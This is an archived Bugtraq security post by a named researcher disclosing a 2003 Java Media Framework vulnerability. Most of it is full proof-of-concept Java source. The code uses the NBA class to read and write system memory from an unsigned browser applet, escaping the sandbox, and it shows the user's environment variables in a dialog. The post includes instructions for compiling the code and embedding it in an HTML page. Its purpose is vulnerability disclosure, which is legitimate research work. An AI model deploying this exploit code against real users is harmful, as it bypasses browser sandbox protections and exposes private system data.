TUCoPS :: Web :: Apps :: bt480.txt

Privilege escalation applet, Java Media Framework JAV:
 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi Bugtraqqers,

this is the proof-of-concept code for the vulnerability
described in http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=3Dfsalert%2F54=
760

The code shows that there is more in this vulnerability than
crash the vm, it allows to read and write SYSTEM memory from
an UNSIGNED applet therefore bypassing the sandbox.
To test it try the applet with java media framework 2.1.1.c
installed, Version 2.1.1.e is patched.

For a test you need to compile the source with
the jmf classes in classpath and construct some html page to
call the ReadEnv class, something like ...

<applet code=3DReadEnv.class></applet>

Use the educational code included at your own risk, it
might crash your browser. The code itself demonstrates how
to read your system environment from an applet in the
lucky case of having jmf installed !

Sincerely

Marc Schoenefeld
www.illegalaccess.org


/*
Proof-Of-Concept: Read Environment via vulnerability Java Media Framework
(2003) Marc Schoenefeld, www.illegalaccess.org

*/

import com.sun.media.NBA;
import java.applet.Applet;
import java.awt.Graphics;
import javax.swing.JOptionPane;
class NBAFactory {

=09=09public static String getEnv(String a,long from, long to) {
=09=09=09long pos =3D findMem(a,from,to);
=09=09=09String ret =3D "";
=09=09=09if (pos  !=3D -1) {
=09=09=09=09long pos2 =3D pos+a.length();
=09=09=09=09ret =3D getString(pos2);
=09=09=09}
=09=09=09return ret;
=09=09}

=09=09public static String getString(long pos) {
=09=09=09int i =3D 0;
=09=09=09StringBuffer b =3D new StringBuffer();
=09=09=09char x =3D 0;
=09=09=09do {
=09=09=09=09x =3D (char) readMem(pos+i);
=09=09=09=09i++;
=09=09=09=09if (x !=3D 0)
=09=09=09=09b.append(x);

=09=09=09} while (!(x =3D=3D 0));
=09=09=09return b.toString();
=09=09}

=09=09public static long findMem(String a, long from , long to)  {
=09=09=09char[] ch =3D a.toCharArray();
=09=09=09for (long pos =3D from; pos < to ;pos++) {
//=09=09=09=09System.out.println(pos-from+":");
=09=09=09=09int i =3D 0;
=09=09=09=09int found =3D 0;
=09=09=09=09for (i =3D 0; i < ch.length; i++) {
=09=09=09=09=09char x =3D (char) readMem(pos+i);
//=09=09=09=09=09System.out.println(pos+":"+x);
=09=09=09=09=09if (x =3D=3D ch[i]) {
=09=09=09=09=09=09found ++;
=09=09=09=09=09}
=09=09=09=09=09else
=09=09=09=09=09   break;
=09=09=09=09}
=09=09=09=09if (found =3D=3D ch.length) {
=09=09=09=09=09return pos;
=09=09=09=09}
=09=09=09}
=09=09=09return -1;
=09=09}

=09=09public static byte readMem(long i) {
=09=09=09byte[] by =3D new byte[1];
=09=09=09NBA searcher =3D new NBA(byte[].class,1);
=09=09=09long olddata =3D searcher.data;
=09=09=09searcher.data =3D i;
=09=09=09searcher.size =3D 1;
=09=09=09searcher.copyTo(by);
=09=09=09searcher.data =3D olddata; // keep the finalizer happy
=09=09=09return by[0];
=09=09}

=09=09public static void setMem(long i, char c) {
=09=09=09NBA b =3D new NBA(byte[].class,1);
=09=09=09long olddata =3D b.data;
=09=09=09b.data =3D i;
=09=09=09b.size =3D 1;
=09=09=09theBytes[c].copyTo(b);
=09=09=09b.data  =3D olddata; // keep the finalizer happy
=09=09}

=09=09public static void setMem(long i, byte by) {
=09=09=09setMem(i,(char) by);
=09=09}


=09=09public static void setMem(long i, int by) {
=09=09=09setMem(i,(char) by);
=09=09}


=09=09public static void setMem(long l, String s) {
=09=09=09char[] theChars =3D s.toCharArray();
=09=09=09NBA b =3D new NBA(byte[].class,1);
=09=09=09long olddata =3D b.data;
=09=09=09for (int i =3D 0 ; i  < theChars.length; i++) {
=09=09=09=09b.data =3D l+i;
=09=09=09=09b.size =3D 1;
=09=09=09=09theBytes[theChars[i]].copyTo(b);
=09=09=09}
=09=09=09b.data  =3D olddata; // keep the finalizer happy
=09=09}


=09=09private NBAFactory() {
=09=09}
=09=09public static NBA getByte(char i) {
=09=09=09return theBytes[i];
=09=09}

=09=09public static NBA getByte(int i) {
=09=09=09return theBytes[(char) i];
=09=09}

=09=09public static NBA[] getBytes() {
=09=09=09return theBytes;
=09=09}

=09=09static NBA[] theBytes =3D new NBA[256];
=09=09static {
=09=09=09for (char i =3D 0; i < 256; i++) {
//=09=09=09=09System.out.println((byte)i);
=09=09=09=09NBA n =3D search(i,0x6D340000L, 0x6D46A000L);
=09=09=09=09if (n!=3Dnull)
=09=09=09=09=09theBytes[i]=3D n;
=09=09=09=09else
=09=09=09=09=09System.exit(-1);
=09=09=09}
=09=09}

=09=09static NBA search (char theChar,long start, long end) {
=09=09=09NBA ret =3D null;
=09=09=09NBA searcher =3D new NBA(byte[].class,1);
=09=09=09byte[] ba =3D new byte[1];
=09=09=09for (long i =3D start; i < end ; i++) {
//=09=09=09=09byte b =3D readMem(i);
=09=09=09=09searcher.data =3D i;
=09=09=09=09searcher.copyTo(ba);
//=09=09=09=09if ( b =3D=3D (byte)theChar) {
=09=09=09=09if ( ba[0] =3D=3D (byte)theChar) {
=09=09=09=09=09return searcher;
=09=09=09=09}
=09=09=09}
=09=09=09return null;
=09=09}
=09}

public class ReadEnv extends Applet{

=09static NBA base =3D new NBA(byte[].class,18);  // what's the base pointe=
r ?



=09public static void crash(Object o) {

=09  System.out.println("Proof-Of-Concept: Read Environment via vulnerabili=
ty Java Media Framework");

=09  System.out.println("(2003) Marc Schoenefeld, www.illegalaccess.org");


=09  NBA ret =3D new NBA(byte[].class,4);
=09  long oldret =3D ret.data;

 =09  System.out.println("Base of data: "+Long.toString(base.data,16));

=09  String[] envs =3D {"USERDOMAIN","USERNAME","USERPROFILE","CLASSPATH",
=09  =09"TEMP","COMSPEC","JAVA_HOME","Path","INCLUDE"};

=09  for (int i =3D 0; i < envs.length; i++) {
=09  =09String val =3D NBAFactory.getEnv(envs[i],base.data,base.data+32768)=
;
=09  =09if (!(o instanceof Applet)) {
=09  =09=09System.out.println(envs[i]+":"+val);
=09=09}
=09=09else {
=09=09=09javax.swing.JOptionPane.showMessageDialog((java.applet.Applet) o,e=
nvs[i]+":"+val);
=09=09}
=09  }


=09  //NBAFactory.setMem(pos+10,'A');
=09  try {
          System.out.println(System.getProperty("java.class.path"));
=09  java.util.Properties p =3D System.getProperties();

=09  p.list(System.out);
=09  }
=09  catch (java.security.AccessControlException e) {
=09  =09System.out.println("Cannot read environment via getProperties:"+e);
=09  }

=09  //System.out.println(pos);

=09  //long pos2 =3D NBAFactory.findMem("mixed",base.data,base.data+6614096=
);
=09  //System.out.println(pos2);


=09  //byte[] x11 =3D new byte[8];
=09  //ret.copyTo(x11);
=09  //for (int i =3D 0; i < x11.length; i++) {
=09  //=09System.out.println(i+":"+x11[i]+(char)x11[i]);
=09  //}



=09  ret.data =3D oldret;

=09  //ret.data =3D 0xffff8000;

=09  //ret.finalize();
=09  //ret.finalize();

=09  //NBAFactory.setMem(ret.data-0xffff8000,33);


=09  //ret.finalize();

=09  /*b.data =3D base.data;
=09  b.size =3D 16384;*/

=09  /*byte[] ba3 =3D new byte[16384];
 =09  b.copyTo(ba3);
=09  for (int i =3D 0; i < ba3.length; i++) {
=09  =09System.out.println(new Integer(i).toString(i,16)+":"+ba3[i]+(char)b=
a3[i]);
=09  }*/

          /*b.data =3D olddata;*/



=09}

=09public static void main(String[] a) {
=09=09crash(null);
=09}

=09public void paint(Graphics g) {

=09=09if (init =3D=3D 0) {
=09=09=09init=3D1;
=09=09=09crash(this);
=09=09}
=09}

=09static int init =3D 0;
}


- --

Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

Marc Sch=F6nefeld Dipl. Wirtsch.-Inf. / Software Developer
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (AIX)
Comment: For info see http://www.gnupg.org

iD8DBQE++NpOqCaQvrKNUNQRAr9CAJ0cp6KYoZbIcpvSMYERu705J2UsoQCdHSes
ZrmYPk58wzmYlS9McwyLw3s=3D
=3DyVd6
-----END PGP SIGNATURE-----

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH